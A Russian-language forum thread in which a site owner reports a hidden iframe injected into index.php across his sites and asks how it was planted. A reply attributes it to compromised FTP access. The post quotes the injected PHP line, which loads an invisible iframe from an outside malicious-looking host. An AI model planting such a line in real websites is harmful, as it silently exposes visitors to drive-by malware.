Перейти к публикации

Нашёл iframe на всех сайтах, как его могли вставить?


Рекомендованные сообщения

Сегодня обнаружил срабатывание касперского на своих сайтах, посмотрил исходный код и в самом низу нашёл этот код:

echo '<div style="visibility:hidden"><iframe src="http://burgerclick.in/ar_zzz/index.php" width=100 height=10></iframe></div>';

Мне интересно как его могли вставить. Код я нашёл в index.php, но дело в том, что дата обновления этого файла на сервере стоит очень давняя, а я неделю назад копировал все файлы к себе на комп и тогда всё было чисто, а сейчас все сайты на сервере были с этим ифреймом, а дата обновления index.php могла стоять очень старая. Как можно изменить файл, чтоб дата осталась прежней?

Если у человека есть "рут" доступ к серверу, он видит фтп пароли к моим сайтам или нет? (извиняюсь за глупый вопрос, но я не программист).

Просто дело в том, что из командера пароли не могли увести, т.к. там пароли и на другой хостинг и, следовательно, ифрэйм был бы и там, но его там нету. Значит пароли украли как-то по другому. Естественно я никому пароли не давал.

В прошлом месяце бала такая же фигня и тоже только на этом сервере, я тогда поменял пароль к админке сервера и некоторые фтп пароли на сайты, но сейчас всё повторилось и пофиг, что я что-то там менял :(

Короче я ничего не могу придумать, кроме как если это делает тот человек, который имеет "рут" доступ к серверу, но я не могу от него отказаться, т.к. он мне так настроил нгинкс на сервере, что при любом изменении любых характеристик на сервере (даже смена фтп на каком-либо сайте) ложит сайты и чтоб этого избежать, мне в таких случаях нужно, чтоб он одновременно был в "рут" доступе и вносил там какие-то коррективы... короче не очень удобно...

Что вы мне можете посоветовать в таком случае, конечно это могли быть и админы хостинг компании, но я у них почти год арендую сервер и такое началось только месяц назад, а человек этот имеет доступ "рут" где-то с весны и тоже раньше всё было нормально... (этот человек имеет довольно хорошую репутацию на этом форуме)

Короче х.з., соврешенно не хочется никого обвинять, но и с такой ерундой возиться надоело...

Мой сайт

Ссылка на сообщение
Поделиться на других сайтах

Скомпрометирован доступ по FTP, как это происходит и из за чего и что делать, уже неоднократно писалось на форуме, в частности

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...